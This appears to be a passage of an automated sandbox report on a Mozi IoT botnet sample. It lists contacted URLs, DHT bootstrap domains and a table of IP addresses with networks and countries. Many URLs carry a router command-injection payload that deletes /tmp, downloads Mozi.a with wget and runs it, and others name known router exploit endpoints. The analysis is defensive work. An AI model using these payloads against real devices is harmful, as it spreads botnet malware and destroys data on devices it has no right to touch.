                            http://148.151.198.239:80/HNAP1/0%Avira URL Cloudsafe
                            http://99.127.224.150:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://86.37.213.28:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://65.18.39.127:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://217.159.91.52:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://7.12.214.254:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://149.24.17.80:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://218.6.139.210:80/HNAP1/0%Avira URL Cloudsafe
                            http://207.125.20.78:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://92.155.118.136:80/HNAP1/0%Avira URL Cloudsafe
                            http://150.18.62.91:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://157.4.81.18:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://115.246.168.140:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://57.12.72.170:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://157.204.251.20:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://68.205.230.225:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://217.254.162.152:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://37.133.196.204:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://110.93.128.77:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://29.254.2.22:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://151.79.222.245:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://18.195.207.198:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://212.14.64.13:80/HNAP1/0%Avira URL Cloudsafe
                            http://221.203.40.250:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://205.131.9.81:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://61.241.212.216:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://85.91.135.227:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://111.105.64.80:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://219.63.223.16:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://24.168.121.6:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://176.165.242.187:80/HNAP1/0%Avira URL Cloudsafe
                            http://92.20.142.99:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://208.82.253.72:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://73.40.19.3:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://120.249.68.155:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://61.102.63.196:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://4.9.133.235:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://118.239.238.222:80/HNAP1/0%Avira URL Cloudsafe
                            http://211.50.44.136:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://174.68.245.171:80/HNAP1/0%Avira URL Cloudsafe
                            http://94.18.186.242:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://49.141.32.63:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://102.245.160.129:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://75.246.37.123:80/HNAP1/0%Avira URL Cloudsafe
                            http://178.236.161.90:80/HNAP1/0%Avira URL Cloudsafe
                            http://www.alsa-project.org.0%Avira URL Cloudsafe
                            http://73.38.215.101:80/HNAP1/0%Avira URL Cloudsafe
                            http://176.86.103.29:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://161.39.199.219:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://69.125.122.242:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://4.249.18.39:80/HNAP1/0%Avira URL Cloudsafe
                            http://62.243.148.102:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://207.42.5.189:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://158.191.76.171:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://44.78.139.193:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://192.29.166.251:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://173.79.32.40:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://32.213.229.81:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://194.252.36.158:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://165.153.177.70:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://85.36.32.17:80/HNAP1/0%Avira URL Cloudsafe
                            http://217.102.189.154:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://68.58.249.175:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://31.143.91.200:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://146.163.35.190:80/HNAP1/0%Avira URL Cloudsafe
                            http://12.1.197.188:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://202.41.248.143:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://197.158.87.143:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://63.185.179.27:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://53.93.18.144:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://144.94.116.224:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://92.101.144.171:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://171.88.32.116:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://50.192.111.242:80/HNAP1/0%Avira URL Cloudsafe
                            http://134.220.54.117:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://90.242.163.64:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://109.159.41.158:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://121.116.7.81:80/HNAP1/0%Avira URL Cloudsafe
                            http://183.24.233.90:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://113.173.184.52:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://203.28.152.29:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://33.198.6.155:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://66.107.205.215:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://167.222.145.76:80/HNAP1/0%Avira URL Cloudsafe
                            http://198.206.241.104:80/HNAP1/0%Avira URL Cloudsafe
                            http://16.186.205.113:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://118.10.156.24:80/HNAP1/0%Avira URL Cloudsafe
                            http://142.29.242.96:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://118.197.10.107:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://21.184.171.120:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://74.157.77.146:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://138.213.12.16:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            NameIPActiveMaliciousAntivirus DetectionReputation
                            dht.transmissionbt.com
                            87.98.162.88
                            truefalse
                              high
                              router.bittorrent.com
                              unknown
                              unknownfalse
                                high
                                bttracker.debian.org
                                unknown
                                unknownfalse
                                  high
                                  router.utorrent.com
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    http://36.124.164.193:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://107.96.233.143:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://100.177.119.90:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://149.73.235.181:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://86.37.213.28:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://70.184.104.0:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://148.151.198.239:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://110.132.229.55:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://99.127.224.150:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://53.85.29.79:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://65.18.39.127:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://7.12.214.254:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://149.24.17.80:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://217.159.91.52:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://92.155.118.136:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://207.125.20.78:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://157.4.81.18:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://150.18.62.91:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://218.6.139.210:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://115.246.168.140:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://57.12.72.170:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://151.79.222.245:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://18.195.207.198:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://217.254.162.152:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://68.205.230.225:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://157.204.251.20:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://110.93.128.77:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://37.133.196.204:49152/soap.cgi?service=WANIPConn1true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://29.254.2.22:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://212.14.64.13:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://221.203.40.250:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://61.241.212.216:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://205.131.9.81:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://85.91.135.227:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://111.105.64.80:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://219.63.223.16:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://24.168.121.6:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://92.20.142.99:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://176.165.242.187:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://208.82.253.72:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://120.249.68.155:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://4.9.133.235:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://94.18.186.242:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://73.40.19.3:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://61.102.63.196:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://211.50.44.136:49152/soap.cgi?service=WANIPConn1true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://118.239.238.222:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://174.68.245.171:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://49.141.32.63:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://102.245.160.129:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://178.236.161.90:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://75.246.37.123:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://73.38.215.101:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://176.86.103.29:49152/soap.cgi?service=WANIPConn1true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://161.39.199.219:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://4.249.18.39:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://69.125.122.242:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://62.243.148.102:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://207.42.5.189:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://44.78.139.193:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://158.191.76.171:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://173.79.32.40:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://194.252.36.158:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://32.213.229.81:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://85.36.32.17:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://192.29.166.251:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://165.153.177.70:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://217.102.189.154:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://68.58.249.175:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://31.143.91.200:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://12.1.197.188:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://146.163.35.190:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://197.158.87.143:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://202.41.248.143:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://53.93.18.144:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://63.185.179.27:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://144.94.116.224:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://171.88.32.116:37215/ctrlt/DeviceUpgrade_1true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://92.101.144.171:37215/ctrlt/DeviceUpgrade_1true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://50.192.111.242:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://113.173.184.52:49152/soap.cgi?service=WANIPConn1true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://134.220.54.117:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://109.159.41.158:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://90.242.163.64:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://183.24.233.90:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://121.116.7.81:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://203.28.152.29:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://33.198.6.155:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://66.107.205.215:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://167.222.145.76:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://198.206.241.104:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://16.186.205.113:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://118.10.156.24:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://142.29.242.96:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://74.157.77.146:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://118.197.10.107:37215/ctrlt/DeviceUpgrade_1true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://21.184.171.120:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://138.213.12.16:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://baidu.com/%s/%s/%d/%s/%s/%s/%s)bin.sh.elf, networks.14.drfalse
                                      high
                                      http://www.alsa-project.org.alsa-info.sh.14.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      103.134.16.183
                                      unknownIndonesia
                                      138142IDNIC-IIBDJ-AS-IDInstitutInformatikaBisnisDarmajayaIfalse
                                      121.12.193.183
                                      unknownChina
                                      58543CHINATELECOM-GUANGDONG-IDCGuangdongCNfalse
                                      201.129.155.197
                                      unknownMexico
                                      8151UninetSAdeCVMXfalse
                                      175.237.148.2
                                      unknownKorea Republic of
                                      4766KIXS-AS-KRKoreaTelecomKRfalse
                                      31.15.98.209
                                      unknownItaly
                                      48862ICLOSICLoSNetworkITfalse
                                      146.58.21.204
                                      unknownReserved
                                      7160NETDYNAMICSUSfalse
                                      85.125.57.243
                                      unknownAustria
                                      6830LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHoldingfalse
                                      100.56.186.180
                                      unknownUnited States
                                      701UUNETUSfalse
                                      57.37.47.90
                                      unknownBelgium
                                      2686ATGS-MMD-ASUSfalse
                                      32.183.226.105
                                      unknownUnited States
                                      20057ATT-MOBILITY-LLC-AS20057USfalse
                                      216.116.80.109
                                      unknownUnited States
                                      14010JACKHENRYUSfalse
                                      146.85.104.3
                                      unknownUnited States
                                      600OARNET-ASUSfalse
                                      60.2.200.196
                                      unknownChina
                                      4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                      67.144.225.171
                                      unknownUnited States
                                      209CENTURYLINK-US-LEGACY-QWESTUSfalse
                                      100.143.0.107
                                      unknownUnited States
                                      21928T-MOBILE-AS21928USfalse
                                      104.120.161.25
                                      unknownUnited States
                                      18209BEAMTELE-AS-APAtriaConvergenceTechnologiespvtltdINfalse
                                      33.211.213.21
                                      unknownUnited States
                                      2686ATGS-MMD-ASUSfalse
                                      196.173.221.126
                                      unknownGhana
                                      37030Airtel-GhanaGHfalse
                                      44.99.155.7
                                      unknownUnited States
                                      7377UCSDUSfalse
                                      210.185.1.70
                                      unknownNew Zealand
                                      4770ICONZ-ASICONZLtdNZfalse
                                      147.76.65.172
                                      unknownAustralia
                                      10152NEC-MELB-DC-AS-APNECAustraliaPtyLtdAUfalse
                                      128.51.176.101
                                      unknownUnited States
                                      11293UCOP-ASNUSfalse
                                      19.240.78.82
                                      unknownUnited States
                                      3MIT-GATEWAYSUSfalse
                                      104.100.16.48
                                      unknownUnited States
                                      16625AKAMAI-ASUSfalse
                                      5.36.159.114
                                      unknownOman
                                      28885OMANTEL-NAP-ASOmanTelNAPOMfalse
                                      178.187.176.89
                                      unknownRussian Federation
                                      12389ROSTELECOM-ASRUfalse
                                      160.172.109.78
                                      unknownMorocco
                                      6713IAM-ASMAfalse
                                      93.211.180.34
                                      unknownGermany
                                      3320DTAGInternetserviceprovideroperationsDEfalse
                                      210.78.153.86
                                      unknownChina
                                      23724CHINANET-IDC-BJ-APIDCChinaTelecommunicationsCorporationfalse
                                      192.88.78.105
                                      unknownUnited States
                                      6419IDDUSfalse
                                      158.46.227.217
                                      unknownRussian Federation
                                      39927ELIGHT-ASRUfalse
                                      184.41.33.155
                                      unknownUnited States
                                      5778CENTURYLINK-LEGACY-EMBARQ-RCMTUSfalse
                                      206.114.157.99
                                      unknownUnited States
                                      701UUNETUSfalse
                                      130.32.28.231
                                      unknownUnited Kingdom
                                      15601BaringInvestmentServicesGBfalse
                                      110.219.30.149
                                      unknownChina
                                      9394CTTNETChinaTieTongTelecommunicationsCorporationCNfalse
                                      158.86.239.37
                                      unknownUnited States
                                      20379NET-BAKERUStrue
                                      105.58.241.37
                                      unknownKenya
                                      33771SAFARICOM-LIMITEDKEfalse
                                      96.43.213.118
                                      unknownUnited States
                                      17184ATL-CBEYONDUSfalse
                                      48.170.71.16
                                      unknownUnited States
                                      2686ATGS-MMD-ASUSfalse
                                      102.202.199.60
                                      unknownunknown
                                      36926CKL1-ASNKEfalse
                                      207.135.111.60
                                      unknownUnited States
                                      6379ALINKUSfalse
                                      124.250.232.210
                                      unknownChina
                                      23724CHINANET-IDC-BJ-APIDCChinaTelecommunicationsCorporationfalse
                                      204.107.60.51
                                      unknownUnited States
                                      1239SPRINTLINKUSfalse
                                      32.75.223.215
                                      unknownUnited States
                                      2686ATGS-MMD-ASUSfalse
                                      205.151.243.120
                                      unknownCanada
                                      852ASN852CAfalse
                                      76.254.156.174
                                      unknownUnited States
                                      7018ATT-INTERNET4USfalse
                                      135.47.142.131
                                      unknownUnited States
                                      54614CIKTELECOM-CABLECAfalse
                                      87.130.126.50
                                      unknownGermany
                                      3320DTAGInternetserviceprovideroperationsDEfalse
                                      195.155.173.186
                                      unknownTurkey
                                      34984TELLCOM-ASTRfalse
                                      146.118.158.60
                                      unknownAustralia
